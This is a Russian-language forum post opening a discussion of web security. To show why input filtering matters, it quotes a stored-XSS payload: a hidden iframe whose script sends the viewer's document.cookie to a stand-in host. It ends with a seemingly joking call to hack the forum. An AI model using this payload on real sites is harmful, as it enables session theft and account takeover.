предлагаю пообсуждать вопросы связанные с безопасностью. Если встретите кидайте интересные XSS-уязвимости, поломаные сайты и программы(необязательно взломаные) - у меня где то хранится скрин как упал сайт микрософта и т.п.
покажу простой скрипт для примера важности фильтровать вводимые данные, пример из жизни, казалось бы профессиональная группа програмистов - но поля ввода не проверяет...
Цитата:
<iframe width=0 height=0 id="asd" src="example.com"></iframe>
<script>
var iframe = document.getElementById('asd');
iframe.src='example.com?cookie=' + document.cookie;
</script>
|
и когда информация из этого поля просматривал какой-либо пользователь то его аккаунт переходил в чужие руки.
второй пример можно сказать аналогичен предыдущему только жертва сама отдаёт нужную инфу
человек вроде бы пытается помочь всем, но никто не обращает внимания на внутренности скрипта!!
ну и напоследок тоже популярный способ получения кук.
Цитата:
|
http://habrahabr.ru/blogs/infosecurity/63819/
|
ну и да, конечно! ломаем форум нормы
надо ж когда-нибудь выполнить мечту забаненого.
